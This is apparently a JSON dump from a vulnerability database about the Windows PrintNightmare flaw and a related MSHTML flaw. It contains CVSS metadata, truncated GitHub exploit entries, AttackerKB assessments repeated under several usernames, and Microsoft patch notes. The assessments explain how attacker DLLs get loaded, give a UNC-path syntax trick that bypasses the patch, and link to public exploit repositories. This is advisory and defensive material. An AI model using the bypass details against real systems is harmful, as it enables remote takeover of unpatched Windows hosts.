{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-08-06T10:28:54", "id": "14B62DA4-FBC4-5B89-AB9F-9F8E3505AFAD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:44", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-29T14:24:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-09-15T02:02:40", "id": "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:24:27", "description": "## CarbonBlack Hunting Query for CVE-2021-1675 (PrintNightmare)\n...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2021-10-24T04:57:49", "id": "17B904FB-7F3D-54F1-B1B5-069C67184EE5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-30T03:47:47", "description": "# CVE-2021-1675\n\nImpacket implementation of the [PrintNightmare ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:24:19", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675"], "modified": "2022-01-30T02:59:13", "id": "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2023-08-07T00:17:41", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**zeroSteiner** at July 08, 2021 5:09pm UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\n**ccondon-r7** at July 08, 2021 12:12am UTC reported:\n\nCVE-2021-34527 is related to the previous CVE-2021-1675. This fixes a vulnerability whereby an authenticated attacker can connect to the remote print service (via either MS-RPRN or MS-PAR) and add a driver using a custom DLL. Upon successful exploitation, the Print Spool service would load the attacker controlled DLL from either a remote UNC path or a local path. In both cases, the DLL is then executed with NT AUTHORITY\\SYSTEM privileges.\n\nThe patch for CVE-2021-34527 is effective at preventing this attack **only when Point and Print** is disabled, which is the default setting. This can be configured by ensuring the registry key `HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint NoWarningNoElevationOnInstall` is 0. The system does not need to be rebooted to enforce the changed registry key. If that registry key is defined as 1, the vulnerability can still be exploited. With Point and Print enabled, a standard UNC path used over the MS-RPRN vector (via `RpcAddPrinterDriverEx`) will fail with `ERROR_INVALID_PARAMETER`. This can be bypassed by converting the UNC path from the standard syntax (`\\\\1.2.3.4\\public\\payload.dll`) to the alternative syntax (`\\??\\UNC\\1.2.3.4\\public\\payload.dll`).\n\nWith the patches applied and Point and Print disabled, the affected calls to `RpcAddPrinterDriverEx` will return ERROR_ACCESS_DENIED.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "attackerkb", "title": "CVE-2021-34527 \"PrintNightmare\"", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-05-25T00:00:00", "id": "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "href": "https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T00:05:47", "description": "Windows Print Spooler Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**kevthehermit** at June 30, 2021 1:53pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**andretorresbr** at July 02, 2021 2:37am UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**architect00** at July 01, 2021 1:46pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**NinjaOperator** at June 29, 2021 5:55pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\n**ccondon-r7** at July 01, 2021 1:43pm UTC reported:\n\n#### Vulnerability\n\nThis was originally classified as a Local Priv Escalation, however recent POC code has been released that enabled a domain authenticated user to remotely escalate to `SYSTEM` on vulnerable services\n\n#### Exploit Code\n\nThere are several functional exploits available on Github after the initial repository was removed by the authors.\n\n * <https://github.com/afwu/PrintNightmare> \u2013 A windows binary exploit \n\n * <https://github.com/cube0x0/CVE-2021-1675> \u2013 Python3 using a modified version of impacket \n\n\n#### Mitigation\n\nInitial testing shows that the patches released are not sufficient to stop this exploit. It has been tested in Server 2016 and Server 2019.\n\nDisable the print spooler can prevent exploitation.\n\nEvent logs can be found for both successful and non-successful exploit attempts in some situations.\n\nSigma rules can be found: <https://github.com/SigmaHQ/sigma/pull/1592>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-1675", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2023-08-01T00:00:00", "id": "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "href": "https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:17:15", "description": "Microsoft MSHTML Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**JunquerGJ** at September 07, 2021 10:50pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**ccondon-r7** at September 07, 2021 7:12pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**nu11secur1ty** at September 22, 2021 4:28pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\n**NinjaOperator** at September 07, 2021 6:45pm UTC reported:\n\n * Vulnerable if default behaviour has been changed ( By default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office both of which prevent the current attack ) \n\n * Requires social engineering to be exploited \n\n * Workaround easy to deploy\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-40444", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-25T00:00:00", "id": "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "href": "https://attackerkb.com/topics/6ojqzQoPox/cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-06-23T19:38:36", "description": "None\n**6/21/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). \n**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\n**Note: **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10 servicing stack update - 19041.1081, 19042.1081, and 19043.1081\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.\n\n**Windows Update Improvements** \n \nMicrosoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptoms**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab &lt;destination path&gt;**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* &lt;destination path&gt;**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this update, you might have issues printing to certain printers. Various brands and models are affected, primarily receipt or label printers that connect via USB.**Note **This issue is not related to [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) or [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>).| This issue is resolved in KB5004237. \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. These changes will be included in the next security update to this channel. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004945>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004945](<https://download.microsoft.com/download/6/0/4/6046cc97-919a-434d-86de-db2fe63580d0/5004945.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/6/2/d/62d4d81c-0498-4abf-95e7-b9be18ddcabd/SSU_version_19041_1081.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004945 (OS Builds 19041.1083, 19042.1083, and 19043.1083) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004945", "href": "https://support.microsoft.com/en-us/help/5004945", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T19:38:44", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003671](<https://support.microsoft.com/help/5003671>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be 